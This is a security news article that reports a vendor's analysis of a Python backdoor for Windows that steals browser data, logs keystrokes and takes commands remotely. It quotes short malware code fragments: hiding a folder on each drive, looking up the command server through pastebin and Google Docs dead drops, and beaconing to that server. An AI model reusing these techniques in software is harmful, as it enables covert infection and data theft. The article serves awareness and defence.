Tuesday, September 10, 2024
HomeBackdoorNew Python Backdoor Allows Hackers to Control Your Infected Device Remotely

New Python Backdoor Allows Hackers to Control Your Infected Device Remotely

Published on

A Newly discovered backdoor that was written in Python has been detected as Python.BackDoor.33 with 3  interesting futures (stealer, keylogger, backdoor) that allow hackers to take full control of your infected device.

Recent threats are mainly had backdoor capabilities and that have many advance futures such as Keylogger, screen capture, webcam, Voice Recorder, File Browser, Remote  Command  Shell and install/uninstall Future.

Malware authors used Some advanced techniques to pack this Trojan to evade the Anti Virus detection.

- Advertisement - EHA

It contains some packed malicious utility file that helps to run python scripts on windows ordinary executable Files. The functions of this malicious program are implemented in a file mscore.pyc.

Also Read : SYSCON Backdoor Uses FTP as a Command & Control Server

How Does This Python Backdoor Works

Once This Backdoor has infected the victim’s Device It saves a copy of the file on a Drive and modifies the Windows Registry key to confirm that, it has successfully launched and shut down the Script.

This Backdoor’s Main Malicious function will execute only after restarting the computer. Once system successfully restarted then this Trojan will Infect all the drives from C to Z.

Later It creates a hidden folder to copy it’s executable and a link to root directory that refers to malicious executable file and All files different from .lnk, VolumeInformation.exe and .vbs are moved to the hidden folder created earlier.

hidden_folder = os.path.join(drive, unichr(160))
if not os.path.exists(hidden_folder):
    os.mkdir(hidden_folder)
ctypes.windll.kernel32.SetFileAttributesW(hidden_folder, 2)

Trojan try to identify the IP address an available port of the command and control server by sending a request to several Internet servers, including pastebin.com, docs.google.com, and notes.io.


url_list = [
    'http://pastebin.com/raw/xf****iX',
    'https://docs.google.com/document/d/1kKwT8qwi********Nw1g65CVDLdphA0qs'
    'http://notes.io/r***H'
]
According to Dr.Web Reseracher, If the backdoor was successful in obtaining the IP address and port, it sends a special request to the C&C server. If the Trojan receives a response , it will download the Python scripts added to the Dr.Web virus databases as Python.BackDoor.35 from the C&C server and run them on the infected device .

GLOBAL_SOCKET.sendall(str({
    'mode': 'buildClient',
    'from': 'client',
    'payload': '{}'.format(MODERATOR), # MODERATOR = "UPX"
    'key': '',
    'module_id': '',
    'session_id': '' }) + '[ENDOFMESSAGE]'

Malicious python scripts implement with 3 main Futures that is stealer, keylogger, backdoor and this Trojan will Perform following activities after infecting the victim’s machine.

  • Steal information from such browsers as Chrome, Opera, Yandex, Amigo, Torch, and Spark;
  • Perform the keylogger functions and make screenshots;
  • Download additional modules are written in Python and execute them;
  • Download files and save then on a media of the infected device;
  • Obtain contents of the specified folder;
  • “Travel” across folders;
  • Request system information.

SHA1:

  • 05cae95a3340395e363c2d6bddbc57833dbdb85c
Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Chinese Hackers Using Open Source Tools To Launch Cyber Attacks

Three Chinese state-backed threat groups, APT10, GALLIUM, and Stately Taurus, have repeatedly employed a...

Small Business, Big Threats: INE Security Launches Initiative to Train SMBs to Close a Critical Skills Gap

As cyber threats grow, small to medium-sized businesses (SMBs) are disproportionately targeted. According to...

Researchers Details Attacks On Air-Gaps Computers To Steal Data

The air-gap data protection method isolates local networks from the internet to mitigate cyber...

Beware Of Malicious Chrome Extension That Delivers Weaponized ZIP Archive

In August 2024, researchers detected a malicious Google Chrome browser infection that led to...

Free Webinar

Decoding Compliance | What CISOs Need to Know

Non-compliance can result in substantial financial penalties, with average fines reaching up to $4.5 million for GDPR breaches alone.

Join us for an insightful panel discussion with Chandan Pani, CISO - LTIMindtree and Ashish Tandon, Founder & CEO – Indusface, as we explore the multifaceted role of compliance in securing modern enterprises.

Discussion points

The Role of Compliance
The Alphabet Soup of Compliance
Compliance
SaaS and Compliance
Indusface's Approach to Compliance

More like this

Backdoor MIFARE Smart Cards Exposes User-Defined Keys On Cards

Researchers analyze the security of MIFARE Classic cards, focusing exclusively on card-only attacks. They...

Hackers Infect Windows With Backdoor Malware Via “Car For Sale” Ad

Fighting Ursa, a Russian APT, has employed a car sales phishing lure to distribute...

Millions of PC Motherboard Were Sold With Backdoor Installed

Gigabyte systems have been identified by the Eclypsium platform for exhibiting suspicious backdoor-like behavior....